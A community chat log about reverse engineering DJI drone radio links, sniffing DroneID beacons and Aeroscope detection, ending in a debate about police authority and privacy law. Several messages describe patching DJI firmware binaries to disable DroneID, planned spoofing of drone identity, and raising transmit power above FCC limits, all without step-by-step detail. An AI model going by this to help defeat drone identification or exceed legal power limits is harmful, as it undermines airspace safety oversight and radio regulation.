[2019-05-12 23:09:13] jabuasab : @zwontzov.da where are you reading your information from?

[2019-05-13 19:13:29] zwontzov.da : @jabuasab What kind of information?

[2019-05-21 07:24:10] nopcode : can you guys recommand a software defined radio with a large frequency range and TX capability?

[2019-05-21 07:27:54] validat0r : Hackrf?

[2019-05-21 07:40:02] nopcode : @ilovemynexus4 that seems unnecessarily expensive

[2019-05-21 07:42:00] validat0r : You wanted "large freq range and tx" .. That excludes some cheap RTL USB dongle

[2019-05-21 07:44:23] nopcode : also the tx power is way too low

[2019-05-21 07:44:28] nopcode : to do anything, i would assume

[2019-05-21 07:44:45] nopcode : i would expect like 1W in something like this to be actually useful

[2019-05-21 08:23:23] wlliamchen : RTL-SDR has maxium working frequency of 1.7GHz. it's designed for reciving DAB boardcast.

[2019-05-21 09:56:30] peteair : I'm using a LimeSDR Mini: it's about 150 usd with very good performance, 1 Rx + 1 Tx and it goes up to 3.5 GHz

[2019-05-21 09:56:53] peteair : > 3.5 GHz (usually 6 GHz) is more difficult to achieve with standard components and the price goes up quickly

[2019-05-21 09:57:06] peteair : ah and it has a sampling rate of 40 msps

[2019-05-21 11:08:07] nopcode : oh that sounds good

[2019-05-21 11:08:10] nopcode : how is the tx power?

[2019-05-21 11:47:17] xela75 : <https://discourse.myriadrf.org/t/limesdr-s-maximum-transmitting-power-at-different-frequencies/1649>

[2019-05-21 12:57:20] nopcode : ah seems ok

[2019-05-21 16:24:03] peteair : this article is not for the mini but yes I've tested it and the higher the frequency, the lower the output power

[2019-05-21 16:24:15] peteair : only a few dBm when you reach the Ghz band

[2019-05-21 16:24:37] peteair : so if you want to have more power you will probably need to add an amp

[2019-05-22 06:44:56] nopcode : is there like a plug & play amp for SDR boxes?

[2019-05-22 06:45:22] nopcode : i wouldnt feel like collecting additional boxes for each frequency band

[2019-05-22 15:35:30] peteair : hm not that I know

[2019-05-22 15:35:50] peteair : it's difficult to have a very wideband amp so you will most probably need a 2.4 GHz one and a 5 GHz one

[2019-05-29 18:38:52] zwontzov.da : The question is about ocusync signal structure on stackexchange :slightly_smiling_face: <https://dsp.stackexchange.com/questions/58064/how-is-dji-ocusync-wireless-link-physical-layer-implemented>

[2019-05-29 20:19:53] zwontzov.da : Does the ocusync use diversity technique on the receiver side? The RC has 2 antennas, so maximal ratio combaining can improve performance, but in FCC document only SISO mode is described for ocusync.

[2019-05-29 20:20:20] zwontzov.da : The device employed 10 MHz, 20 MHz modes support SISO mode at antenna chain 0 or chain 1. Why is it? <https://fccid.io/SS3-OAS11709/Test-Report/Test-Report-3634081>

[2019-05-29 20:26:47] zwontzov.da : Is it only for FCC testing mode? SYSTEM TEST CONFIGURATION Description of Test Configuration The system was configured for testing in Engineering Mode, which was provided by the manufacturer. The device employed 1.4MHz, 10MHz, 20MHz modes and Wi-Fi 802.11b, 802.11g, 802.11n ht20 modes, 1.4MHz, 10MHz, 20MHz only support SISO mode at antenna chain 0 or chain 1, Wi-Fi 802.11b/g/n ht20 mode support SISO and MIMO modes. <https://fccid.io/SS3-M1P1607/Test-Report/Test-Report-3146117>

[2019-05-30 11:22:31] peteair : the "chinese" site mentionnend on Stack Exchange is indeed only a generic description of OFDM modulation (hence the mention of Alamouti code)

[2019-05-30 11:23:12] peteair : concerning your other question, I don't know but the second FCC doc you shared mentionned MIMO/SISO because it's about WiFi not Ocusync

[2019-05-30 11:23:37] peteair : I guess your first document is more related to ocusync and seems to mention SISO only

[2019-05-30 18:28:50] zwontzov.da : It's very strange... The Ocusync should be more quality of receive in comparison with WiFi. Why do they use only 1 Rx antenna? In LTE publications and reports, the common scheme is 1Tx - 2Rx antennas.

[2019-05-30 19:54:39] jakwnd : I also think its important to realize OcuSync uses two different links(?)/bands(?)/(idk the right term) for uplink and downlink

[2019-05-30 19:55:07] jakwnd : uplink is OFDM while downlink stays put and is much larger

[2019-05-30 19:55:33] jakwnd : the downlink hops channels only when there is interference

[2019-05-31 07:05:46] peteair : don't you think downlink is ofdm as well ?

[2019-05-31 07:06:34] peteair : and to answer the question from Sam, yes I think diversity is a always a good thing but it adds receiver and processing complexity for a, sometimes, small gain

[2019-05-31 07:07:12] peteair : so as Ocuysync is already much more efficient than regular WiFi, maybe it was more interesting to not use MIMO to avoid over-complexity

[2019-05-31 07:10:04] zwontzov.da : They use Leadcore chip which provides LTE standard processing. Unfortunately, we have no specification, but I think one supports SIMO mode. May be there are some problems with AD9361 and it channels...

[2019-05-31 13:02:34] peteair : LC is the main processor but not the one managing the RF layer. AD9361 is just the digital to analog (and vice versa) chip transforming IQ data into physical signal

[2019-05-31 13:03:17] peteair : my understanding is that the real part where Ocusync resides is the FPGA and the chip managing the RF layer and in charge of the modulation (just before the FPGA/AD931 I guess)

[2019-05-31 13:05:13] peteair : I'm not sure the LC1860 reversing (eg. <https://github.com/fvantienen/dji_rev>) gave any clue about the Ocusync modulation ? unless someone can say otherwise

[2019-05-31 18:02:15] zwontzov.da : thx. I thought that FPGA is only in previuos DJI models with Lightbridge

[2019-05-31 18:05:50] zwontzov.da : but at the photos I don't see FPGA <https://github.com/o-gs/dji-firmware-tools/wiki/WM220-Core-Board-A>

[2019-05-31 18:54:33] jakwnd : From recordings I've never seen the downlink jump around unless it was changing channels due to interference. There may be a ofdm aspect to it for sync or authentication, but it seems pretty standard to me. Lightbridge uplink had a clear pattern for the ofdm and ocusync seems to have it randomized. My understanding was that lightbridge uses a fpga for the rf and ocusync they use a more programmable SDR so they can implement updates easily.

[2019-05-31 18:55:58] jakwnd : There is very little to learn from an RF side from the LC 1860, it seems to communicate with the rf module either over serial or i2c, either way it doesn't help with modulation

[2019-05-31 19:19:54] zwontzov.da : Where do frames form? LC 1860 is only en(de)coder and (de)modulator. In ARMs into LC? What is the main CPU of drone? If it's LC, we can't analyze communication between chips by i2c, spi, etc :disappointed:

[2019-06-04 10:07:58] peteair : Demodulation could be done blindly (without knowing anything about it). I'm pretty sure that's ofdm now for lightbridge and I've made some progress (definitely ofdm). So once it's demodulated we could learn some things about channel coding and encryption by looking at the exchange between [chips.am](http://chips.am) I right ? I can help for demodulation part but I'm not so versed in spi sniffing and so on

[2019-06-04 17:45:22] jakwnd : Once it's demoded we should be able to see the droneid at least, as it shouldnt be encrypted

[2019-06-09 12:06:02] zwontzov.da : What do you know about Aeroscope hardware? Is it own ASIC, FPGA, DSP or common CPU? I can't find the photos or description :disappointed:

[2019-06-09 16:41:42] jakwnd : Have no idea

[2019-06-23 21:08:56] zwontzov.da : What does mean peer id?

[2019-06-25 23:54:07] kyokushin : Only AC is spreading Drone ID or RC also?

[2019-06-26 09:10:41] validat0r : only ac .. and it's kinda garbled on spark. I don't think it's useful to aeroscopes ..

[2019-06-26 16:03:57] kyokushin : hmm garbled?

[2019-06-26 16:06:50] validat0r : well, from what I saw in wireshark / kismet-wireless, there's no meaningful content in the spark droneid packets

[2019-06-26 16:06:59] validat0r : just zeros

[2019-06-26 16:07:15] validat0r : my wifi card could have picked it up wrong, of course

[2019-06-26 16:09:08] validat0r : I saw only 3 bytes of data that wasn't 0x00

[2019-06-26 16:09:20] validat0r : not much info you can pack in 3 bytes

[2019-06-26 16:09:34] validat0r : disabled it anyway

[2019-06-26 16:52:57] kyokushin : Hm, disabled how?

[2019-06-26 19:40:36] validat0r : I patched the activation in the appropriate binary

[2019-06-26 19:52:05] kyokushin : hm how?

[2019-06-26 19:55:44] validat0r : vi

[2019-06-26 20:10:23] kyokushin : okay, but in which file and how to get to it?

[2019-06-26 20:36:38] validat0r : Dji_network

[2019-06-26 20:44:33] kyokushin : hmm, i was less active in last half year, what is that?

[2019-06-26 21:00:43] validat0r : A binary in 801

[2019-06-26 21:04:23] kyokushin : ookay, but how you edit that? i know in vi, but not exactly know you have on mind

[2019-06-26 21:05:03] validat0r : Let's go there when you have your working spark back

[2019-06-26 21:05:18] kyokushin : Sure

[2019-07-01 07:55:13] xela75 : is it the same Dji_network file on Mavic to disable Drone ID ?

[2019-07-01 08:43:02] validat0r : No

[2019-07-01 08:44:18] eitan1195 : it is a part of the ath9k driver

[2019-07-01 11:49:29] xela75 : Hum ok because it's wifi

[2019-07-01 11:49:32] xela75 : thx

[2019-07-01 11:52:30] eitan1195 : anyone had any progress researching the ocusync?more specifically the droneid channel in it?

[2019-07-01 11:54:48] validat0r : on mavic it's believed to live in dji_hdtv_uav

[2019-07-01 11:56:01] validat0r : but you'd need sophisticated radio equipment or an actual aeroscope to check anything on ocusync

[2019-07-01 11:57:40] eitan1195 : are you refering to ocusync?as i believe it resides much lower than dji_hdvt_uav

[2019-07-01 11:57:59] eitan1195 : the "how" is what's interesting, not the |"where"

[2019-07-01 11:58:31] validat0r : i was talking to @xela75

[2019-07-01 12:00:39] xela75 : yes on mavic 1 it's ocusync

[2019-07-01 12:02:32] xela75 : and knowing where and in what file droneID would be set is already interesting

[2019-07-01 12:03:28] xela75 : but I assume that NLD team already knows that

[2019-07-01 12:03:44] validat0r : i know of at least one attempt to disable it, but it could never be disproved without access to a aeroscope

[2019-07-01 12:03:47] xela75 : because it's in the pipe

[2019-07-01 12:04:30] validat0r : good to know it's in the pipe

[2019-07-01 12:05:42] xela75 : I heard @coldflake talking about it...

[2019-07-01 12:09:30] xela75 : indeed there is a "drone id %s" string in dji_hdvt_uav

[2019-07-01 12:43:23] coldflake : We have it on the shelves and we can put it out in the next release

[2019-07-01 12:43:59] coldflake : Which then will be out around Friday maybe a little earlier :)

[2019-07-01 14:05:37] fredmicrowave : That´s super cool. I was actually wondering if this was still on. I remember opining that custom ID (vs no ID ) may not be a good idea, but on a second though, it may be useful ...

[2019-07-01 14:06:41] fredmicrowave : "A little earlier" sounds cool .

[2019-07-01 15:42:14] kyokushin : Excellent news @coldflake

[2019-07-03 18:57:43] kyokushin : Will that disable spreading of gps location of drone/operator to aeroscope?

[2019-07-05 07:42:55] xela75 : drone and homepoint

[2019-07-05 09:25:45] peteair : homepoint as in RTH ? Is it broadcast by the drone ?

[2019-07-05 10:16:19] validat0r : yep

[2019-07-05 10:16:48] validat0r : so chines gov always knows where to snatch you

[2019-07-05 12:54:48] peteair : ahahah funny

[2019-07-05 12:54:59] peteair : is this something you have seen in the firmwares ?

[2019-07-05 12:55:21] peteair : I'm beginning to poke around the Mavic 2 firmware but it's still a bit cryptic for me

[2019-07-17 19:37:49] jakwnd : Has anyone tried looking at the RF and demoded LB or Ocu? The Spark drone id will populate on the latest firmware. At least I saw gps, the flight purpose messages never had any meaningful data other than serial number.

[2019-07-18 12:11:56] antoine.menini : it seems difficult to do

[2019-07-18 12:12:10] antoine.menini : there is no info about modulation of LB or Ocusync

[2019-07-18 12:12:53] antoine.menini : is the drone id sent using the same protocol as the other information?

[2019-07-23 23:58:06] ryan929 : Just saw this -- I may be interested in looking at the blackbox RF - can you share an overview of which models it is on for me as I'm new to this device type, although very used to looking at blackbox RF on other things...

[2019-07-31 07:35:05] eitan1195 : did anyone by any chance do some work on the modulation(de-modulation) of the lightbridge and could possibly shed some light on a few aspects?thnx

[2019-07-31 11:39:20] mefisto : You should probably start by looking at AD9363 specs. This is the transciever lightbridge2 used in its original version, in early ph3s. Before they switched to Artosyn knock-off. So lightbridge signals are definitely within what AD9363 can do. And we can easily read SPI commands sent to it from STM32, so we can get specifics on how it is configured. This is what I did when making the ability to set power to fcc and above.

[2019-07-31 12:08:20] eitan1195 : [thanks.do](http://thanks.do) we know if it is wimax or not?tried using gnuradio chains for wimax and did not succeed..

[2019-07-31 12:25:16] mefisto : No idea. Check in specs which registers are used to configure what you want to know in AD9363, then we can look at what is written to these registers and find out in which mode AD9363 operates.

[2019-08-01 07:56:15] peteair : hi, my other idea for that topic was to analyse the FPGA bitstream because I guess the real info about modulation are there

[2019-08-01 07:56:27] peteair : any idea on how to do that ?

[2019-08-01 07:56:39] peteair : do we have any change to that find strings or other clues in the FPGA bitstream ?

[2019-08-01 11:57:23] mefisto : fpga bitstream contains info on digital processing, error correction etc. FPGAs do have auxiliary fixed blocks, but I doubt there's one for modulation.

[2019-08-01 11:58:48] mefisto : The bitstream format was public for older Altera FPGAs; so I guess we could try finding the same structures in newer bitstreams. But I doubt anyone did that.

[2019-08-01 12:04:16] mefisto : The STM32 firmware is much easier to analyze. I even published some symbol definitions for specific firmwares: <https://github.com/o-gs/dji-firmware-tools/tree/master/symbols>

[2019-08-01 13:11:52] peteair : thank you for that !

[2019-08-05 17:36:38] mutantroar : I'm at a bit of an impasse and I was wondering if someone could point me in the right direction. I've been able to sniff the droneid from my Spark from the beacon packets when operating in WiFi without the RC...easy. Using the RC...not so easy.

[2019-08-05 17:37:01] mutantroar : The access point on the RC is not broadcasting it in its beacon packets, so it must be in the C2 signal. Irrespective of whether you use the RC or not, you can set the Wifi channel, so I was suspecting the RC is just using some type of ad hoc Wifi network to communicate with the Spark, but still using WiFi.

[2019-08-05 17:37:17] mutantroar : Can anyone confirm that and if there "should" be some way to sniff that with a WiFi adapter? The Drone-RC signal changes to a single 5MHz channel instead of the wider bandwidth when not using the RC. I was hoping I'd be able to sort this out by manually setting frequency and bandwidth parameters on my adapter to just the 5Mhz bandwidth and just sniffing with Wireshark, but no joy.

[2019-08-05 17:51:18] validat0r : spark rc is using ad hoc mode

[2019-08-05 17:51:41] validat0r : beacons should only emanate from AC

[2019-08-05 17:52:29] validat0r : only few wifi cards can be configured to sniff the 5Mhz channels

[2019-08-05 17:53:09] validat0r : try kismet

[2019-08-05 17:53:26] validat0r : /usr/local/etc/kismet_site.conf: source=wlan10k0:add_channels="149W5,153W5,157W5,161W5,165W5,151W5,155W5,159W5,163W5,153W5,1W5,2W5,3W5,4W5,5W5,6W5,7W5,8W5,9W5,10W5,11W5,12W5,13W5,14W5"

[2019-08-05 17:53:59] validat0r : I had luck with my old thinkpad's wifi adapter

[2019-08-05 17:54:38] validat0r : Atheros ath9k Atheros QCNFA222 AR5BWB222 / pci cards seem to support it

[2019-08-05 17:56:42] validat0r : I found droneid to be crippled on spark. no flight purpose, gps coords, etc. maybe due to old firmware .0300 / GO 4.1.14, did my tests some 12 months ago

[2019-08-05 18:13:21] mutantroar : Thanks for that about the cards/chipset. It took me a while to get a card that would be able to even get the higher 5Ghz U-III-3 channels like 149+ It seems to be a bit of trial and error.

[2019-08-05 18:25:36] validat0r : obviously i got my droneid frames on 2.4GHz .. T41p has no 5GHz capa :smile:

[2019-08-05 18:27:38] mutantroar : uggh. Spark seems to like hanging out at 5GHz in Auto mode

[2019-08-05 18:27:55] validat0r : you can force it to 2.4GHz somehow ..

[2019-08-05 18:28:39] validat0r : I think GO 4.1.22 can put it in the lower band

[2019-08-05 18:28:55] mutantroar : Yeah...it was nice trying to sniff at 5Ghz since it wasn't crowded with other noise

[2019-08-05 18:29:31] validat0r : if you've got the right wifi card .. I didn't, so i had to try on 2.4

[2019-08-05 18:33:30] mutantroar : I think you've nailed my problem. You were able to get the adhoc packets, though, right?

[2019-08-05 18:33:39] validat0r : yup

[2019-08-05 18:33:48] mutantroar : :slightly_smiling_face:

[2019-08-05 18:35:04] validat0r : ac<->rc is adhoc .. standard infrastructure is just smartdevice<-> ac, which is boring, since you can't really go far in that mode

[2019-08-05 19:11:34] kyokushin : <https://translate.google.pl/translate?sl=pl&tl=en&u=https%3A%2F%2Fnextron.pl%2FAeroScope-Opis-i-mozliwosci-wykrywacza-dronow-blog-pol-1563455047.html>

[2019-08-05 19:11:59] kyokushin : its from polish website so google may translate it poorly, but to the point - they wrote aeroscope see Sparks.

[2019-08-05 20:09:11] validat0r : awesome .. i've been looking for such a test for long

[2019-08-05 20:10:37] validat0r : i dont see any spark detections though ..

[2019-08-05 20:11:03] validat0r : they may have copied it from the marketing specs of aeroscope

[2019-08-05 20:25:08] kyokushin : no, they had it - its an shop with drone accessories

[2019-08-05 20:41:02] mefisto : Spark is on their "supported" list, but not "tested" list. And I have a feeling that was more like a presentation by DJI than real tests.. might be wrong though. I highly doubt Aeroscope can see a drone location 2-3 seconds after it's turned on.

[2019-08-05 20:41:48] validat0r : hell i dont even have a gps fix after 3 secs ..

[2019-08-05 20:42:41] validat0r : and yes .. text doesnt say spark was tested .. neither was MA

[2019-08-05 20:43:27] kyokushin : yes, they had different drones to test as i see

[2019-08-05 20:43:49] validat0r : and if the AC is sitting somewhere in tall grass behind a tree, I doubt they catch a droneid frame that fast

[2019-08-06 16:00:38] zwontzov.da : @ilovemynexus4 I haven't special wifi card, but have SDR. I wanna see DroneID bursts in the spectrum. I write IQ samples in the wide bandwidth and see common 20 MHz channel from AC, but can't see the 5 MHz bursts :disappointed: Does the DroneID occupy the same CH as common 20 MHz link? And what is about of DroneID burst period in time domain?

[2019-08-06 16:21:29] validat0r : Motor has to be armed, you know

[2019-08-06 16:22:46] validat0r : Have to check my cap files for the rest.

[2019-08-06 16:34:56] zwontzov.da : Thx. I will check myself)

[2019-08-06 16:55:36] validat0r : i'm not sure you're gonna see "bursts" .. it's just the occasional packet, i have two in my pcap, 19s apart

[2019-08-06 16:56:05] validat0r : interestingly on ch.1 and ch.3

[2019-08-06 17:10:47] validat0r : but i didnt do any "in depth" analysis .. I just wanted to confirm, that my defeat worked

[2019-08-06 17:12:33] validat0r : i.e. i'm not sure any more the AC had a proper GPS fix during my test. I suspect, not

[2019-08-06 17:13:24] mutantroar : @zwontzov.da are you talking about capturing the DroneID from the WiFi signals (like the Spark) with the SDR or trying to get it from the lightbridge or Occusync RF signals?

[2019-08-06 17:16:51] zwontzov.da : @ilovemynexus4 I want to start from known DroneID, i.e. WiFi. I reread Department13 description and try to see packets from drone. Thanks for your reply. I will try analyze my records. Unfortunately, my Spark is broken and I can't make new records.

[2019-08-06 17:17:25] validat0r : that's unfortunate

[2019-08-31 19:32:04] jemo07 : @sam how are you capturing the data with the SDR? I’m having lots of interference at home and can’s seem to get a good look at the traffic to begin defining a flowgraph to properly capture and begin to attempt to decode. Thanks!

[2019-09-04 05:26:25] eseven : Any one knows the firmware update release version that implements droneID on Phantom 4 Pro? I've been looking for a link on historical info on every DJI firmware updates features with no success... :confused:

[2019-09-05 02:20:16] digdat0 : dated 2017-12-01: <https://www.dji.com/newsroom/news/dji-introduces-voluntary-flight-identification-options-for-drone-pilots> p4p release notes: <https://dl.djicdn.com/downloads/phantom_4_pro/20180308/Phantom_4_Pro_Release_Notes_EN.pdf> p4p V 01.05.0300 was released on 2017.12.25, so thats probably the one? Or, did they release it silently before announcing publicly? This article is from 2017-11-16 <https://www.kismetwireless.net/development/droneid/> so its likely it was added earlier? also, what about GO support for DroneID? What version was that in?

[2019-09-05 09:09:55] xela75 : it's for wifi only i guess

[2019-09-05 11:53:23] eseven : Thanks @digdat0!!

[2019-10-05 15:03:23] nocommie : So I recently saw a report from this system. <https://www.911security.com/products>

[2019-10-05 15:04:17] nocommie : Some of the screens has "aeroscope" on it so I imagine it is just a repackaging of it.

[2019-10-05 15:05:08] nocommie : It showed the home position, current drone position, craft name, aeroscope ID and drone ID..

[2019-10-05 15:06:50] nocommie : The particular incident I observed indicated it was in and out of controlled airspace.

[2019-10-05 15:07:59] nocommie : What is concerning is that the local law enforcement are attempting to catch these violators and are being told bad info by uninformed drone "experts" in the department.

[2019-10-05 15:09:26] nocommie : My concern is that these uninformed experts give the line guys bad info and will be taking action against normal hobbies or commercial operators that know what they are doing and are legit, not breaking any laws.

[2019-10-05 15:10:39] nocommie : So, now more than ever I want to spoof my aeroscope info. I am guessing it is still not possible on P4, Mp1 or Mp2?

[2019-10-05 15:12:19] nocommie : I have been contemplating switching from DJI but frankly there weren't many options until now. My Anafi thermal and the Skydio 2 will be replacing my DJI fleet soon.

[2019-10-05 20:10:28] dkovar : What "bad info" are they being told?

[2019-10-05 22:27:04] cantrepeat : I know it's do able, spoofing the ID, @coldflake said they had it done and would release it in a version of NLD. Dunno when that will happen.

[2019-10-06 01:50:46] bobdole : bad info - advising local law enforcement that they are somehow agent's of FAA that can decide what aircraft to take down from the sky?

[2019-10-06 01:51:03] bobdole : LOL... that would be priceless

[2019-10-06 02:33:22] nocommie : Bad info as an example, get their ID, 107 if they have one, serial number of the controller, serial and registration of the aircraft SIMPLY for someone "complaining" about a drone, even if no laws are broken. And that they can be detained for "trespassing" if they violate a TFR even if they are not physically on the property.

[2019-10-06 10:17:12] dkovar : That's not bad info. They are entitled to ask for that information and until the case law shakes out, it is not terrible advice. They have a duty to respond to complaints. (Ref recent IED attacks via drone in PA.) It isn't information we agree with, but that's a different story. And, if it does turn out to be bad, i.e. wrong, then we'll have case law to support that position and it'll be much easier to say "Don't do this." That's the way the legal system works. We don't want LE "harassing" hobbyists but that doesn't necessarily make the advice bad. Also, most LE I know would prefer not to hassle anyone. They have better things to do with their time.

[2019-10-06 10:19:20] dkovar : This is an example of some materials that an LE group I know are using to educate themselves. <https://www.foxrothschild.com/content/uploads/2019/10/Aviation-Law-Drone-Defense_-The-Rules-The-Regulations-and-What-You-Can_t-Do-10.01.19.pdf>

[2019-10-06 12:53:30] cantrepeat : Hogwash, in the US as least. Just because someone drops dope in a prison and others use weapons with explosives on them to destroy oil facilities doesn't make a Joe with a Mavic subject to stop and frisk type behavior by police.

[2019-10-06 12:59:57] dkovar : That is your opinion. The law says otherwise. We can object but if there are legitimate grounds for asking for documentation, LE will use them. It isn't "stop and frisk of every Joe with a Mavic". It is a legal request for documentation operators are required to have by sworn LE in the course of their duties.

[2019-10-06 13:25:56] cantrepeat : If I'm flying a drone in an unrestricted area then the LE has no probable cause to initiate that contact.

[2019-10-06 13:26:18] cantrepeat : They can't assume that I'm breaking the law and ask for papers.

[2019-10-06 13:29:12] dkovar : That wasn't the stated use case. The stated use case was "SIMPLY for someone "complaining" about a drone". Agreed, if no probable cause, no justification.

[2019-10-06 13:30:13] cantrepeat : people can complain about legal behavior all they want. It doesn't make that behavior illegal so again, don't stop me and ask for papers

[2019-10-06 13:30:46] bobdole : people always complain about drones... what we need are more complaints flooding the police dept

[2019-10-06 13:42:27] dkovar : If you run a dirt bike up and down the street and someone calls in a noise complaint, LE will stop you and ask for your license. If you run a drone up and down the street and someone calls in a noise complaint, LE will stop and ask you for your license. It is exactly the same thing. Drones don't get some sort of free pass.

[2019-10-06 14:00:27] bobdole : this is assuming someone with the drone is being obnoxious as the guy in the dirtbike. people just dont like drones in the sky potentially seeing over their fences

[2019-10-06 14:00:38] bobdole : the complaints are not comparable

[2019-10-06 14:01:50] bobdole : for LE to have authorization to take aircraft down from the sky, they better be as well versed in what is going on up there as a part 107 UAS pilot at a minimum

[2019-10-06 14:03:40] bobdole : eventually all this overpriced crap being sold to idiots over drones is going to catch up with them.. hopefully before they hit retirement

[2019-10-06 14:13:04] dkovar : You're mixing the discussions. "Taking down the aircraft" is not an option for local LE at the moment. And hopefully, never.

[2019-10-06 14:39:56] cantrepeat : running a non registered dirt bike up and down the street is an illegal activity. Flying a drone in non regulated air space is not illegal. Those are apples to oranges

[2019-10-06 14:40:41] cantrepeat : Flying a drone up and down the street is not an illegal activity. You don't get to ask for my papers when I'm not doing anything illegal

[2019-10-06 14:43:06] cantrepeat : Look at all the shit over legal open carry, LE is getting their asses handed to them for stop and ID. If you are open carry in a legal state then LE can get bent. Same with flying a drone.

[2019-10-06 14:45:23] cantrepeat : look at all the first amendment audits around police stations and military installations, it's a legal activity and people are refusing to ID.

[2019-10-06 14:45:39] cantrepeat : same shit applies to legally flying a drone no matter who complains about it.

[2019-10-06 15:05:28] bobdole : probably no way around drone identification and i'm guessing its going to eventually turn into something where you can spot and identify any drone in the sky (or flightradar24) just like you can pull up info on a pilot from the registration number on the plane.

[2019-10-06 15:34:43] dkovar : Yep. This is all Remote ID.

[2019-10-06 17:27:04] cantrepeat : After 23 years in the Army I'm about a pro cop as they come, but, I'm also pro rights for the average Joe. Trying to initiate contact over a legal activity so they can go fishing is pure BS.

[2019-10-06 17:32:09] cantrepeat : Sorry for the rant, just some strong feelings about this kind of stuff.

[2019-10-06 18:36:20] dkovar : Strong feelings and rational arguments such as yours are quite welcome.

[2019-10-06 20:40:46] nocommie : To be clear, the statement was that if an officer gets ANY call for service about a drone, regardless if there was any violation they were to get all that info. My response was what if the pilot responds "Am I being detained? If so, for the investigation of what crime?" Then, assuming no crime, and they refuse to provide any of that info what are you going to do? Just because "someone" calls in and "complains" about a drone, doesn't mean it is automatically a violation of law and you can be detained, searched.

[2019-10-06 20:42:08] nocommie : My concern is that aeroscope etc is going to be running all the time and this "expert" will dispatch patrol officers to get this info from operators with no justification. To start, he is telling them incorrect info about what authority they have.

[2019-10-06 20:42:22] bobdole : i'm more worried about the interruption while piloting.

[2019-10-06 20:44:48] bobdole : if a cop is called out about someone harassing a wild animal that is protected, that cop can't really do anything about it. i imagine it would be the same with a pilot unless lives were in danger

[2019-10-06 20:47:05] nocommie : The problem is that this expert and many in law enforcement don't know the rules and are making incorrect assumptions. As example, someone flying a drone legally can be detained, forced to provide S# etc. and can be detained for "trespassing" for flying a drone in the NAS (TFR violation or not). All this info was given to a 3rd party and relayed to me. I gave them some counter questions to ask (I have a LE background) and the "expert" had to change his stance on what he said when certain things were pointed out. The problem is, this "expert" is advising all patrol officers of what they should do when dealing with drone operators.

[2019-10-06 20:49:27] nocommie : I fly legally and I will be DAMED if I will allow an LEO treat my like a criminal when I am flying legally. Actually, let them do it and then write a check later. It's just time to ditch DJI with all their nanny BS and broadcasting to the world my personal info.

[2019-10-06 20:52:27] nocommie : Another area I want to research is if wiretapping laws prevent getting my info via aeroscope etc. It is an encrypted comms between me and the aircraft. I am not agreeing for anyone to intercept it. Maybe it is in the DJI EULA that says I agree to allow them to broadcast it. If not, evidence of a crime, warrant or court order is needed for LE to intercept the info from my craft without my permission.

[2019-10-06 22:10:45] cantrepeat : @nocommie "If not, evidence of a crime, warrant or court order is needed for LE to intercept the info from my craft without my permission." exactly!! With PC or a warrant stopping someone for a legal activity is in fact illegal. Hacking into your drone, which is basically a flying computer is against the law without a warrant unless you are engaged in illegal activity and even then it's still suspect.

[2019-10-06 22:21:10] validat0r : Droneid Isn’t encrypted

[2019-10-06 22:48:42] nocommie : Ah ok, not encrypted. Still, that doesn't change the fact that it is still wiretapping. I remember when the old cellphone comms.could be picked up on a regular scanner. It was still illegal to intercept it without one parties consent.

[2019-10-07 00:32:46] dkovar : It is intentionally broadcast with the intent of being received. There is nothing illegal about two devices made by the same company communicating with each other.

[2019-10-07 00:47:31] nocommie : I understand what you are saying but don't agree that it is legal. The manufacturer does not have the right to broadcast your info without a regulatory requirement or your consent. There is no law about drone ID (yet). Now if the EULA has something about it that is different. Then you have to look at an EULA for each FW update. EX: my MP1 EULA prob didn't have it but maybe a later FW where they enabled drone ID does? Suffice to say this is all emerging tech and a whole new area of law to figure out. Can't really compare it to anything else (motor vehicles etc) because it was unregulated until 107. If 107 doesn't address something, like drone ID, there is no compelling regulatory requirement for what DJI is doing.

[2019-10-07 00:51:54] nocommie : So for example if huawei enabled the broadcast of your location or text message content etc and said it was "intentional" does that make it "legal"? Maybe it is in the fine print of the EULA but you have no way to turn that off. Does using the device automatically imply consent?

[2019-10-07 00:57:38] cantrepeat : Without a law in place then you should be able to opt-out of any of your information being gathered or broadcast.

[2019-10-07 01:04:03] dkovar : You can opt out by not buying the device. It's been awhile since I paid attention while activating a DJI product but I am fairly certain that you agree to sharing certain information that is going into the ID when you activate the product.

[2019-10-07 01:07:20] nocommie : Agreed, you can decide NOT to buy it IF it is in the EULA. But, how could it be in an EULA on a device where it was not capable until a later FW? Thats my point, maybe a later FW has the EULA that specifies it? But, looking at the bigger picture, an EULA etc does not trump regulations, statues, local/state/fed law.

[2019-10-07 01:08:00] nocommie : Just because it is in a contract doesn't mean it can violate law.

[2019-10-08 01:48:01] bjoneseying : Can aeroscope intercept the signal if operating on 2.3/2.5Ghz?

[2019-10-08 02:46:50] brett.e.burkhart : Dumb American here but wouldn’t this fall under GDPR for our European friends? If personally identifiable information is being transmitted to a 3rd party paying the manufacturer for this information without the “willful consent” of the user by a tech company that seems like GDPR territory. Aeroscope claims to be able to pick up drones 50 km away. This means that it will be picking up data from drones that are operating perfectly legally. Any Asroscope user could use this to collect and process data of users without any oversight whatsoever. I think a GDPR complaint from one you Europeans would do some good as DJI is clearly in violation of GDPR when it has you agree to EULA because it cannot be revoked and there is no way to use DJI’s software without agreeing to it. Art. 7 GDPR Conditions for consent Sections 3-4 “The data subject shall have the right to withdraw his or her consent at any time. The withdrawal of consent shall not affect the lawfulness of processing based on consent before its withdrawal. Prior to giving consent, the data subject shall be informed thereof. It shall be as easy to withdraw as to give consent. When assessing whether consent is freely given, utmost account shall be taken of whether, inter alia, the performance of a contract, including the provision of a service, is conditional on consent to the processing of personal data that is not necessary for the performance of that contract.”

[2019-10-08 02:51:48] brett.e.burkhart : And that’s a small piece of the pie. It seems DJI violates GDPR in every way imaginable

[2019-10-08 09:52:00] dkovar : It is not being intercepted. It is being broadcast and received by devices made by the same manufacturer specifically to exchange this information. Their users are informed, though it is buried in legalese. This has been the way of informing users for decades.

[2019-10-08 12:09:03] cantrepeat : I believe the part of show your license is for part 103 commercial use of drones.

[2019-10-08 12:09:17] cantrepeat : doesn't apply to hobbiest

[2019-10-08 12:10:50] cantrepeat : or is it part 107?

[2019-10-08 12:11:52] cantrepeat : yeah part 107 commercial test

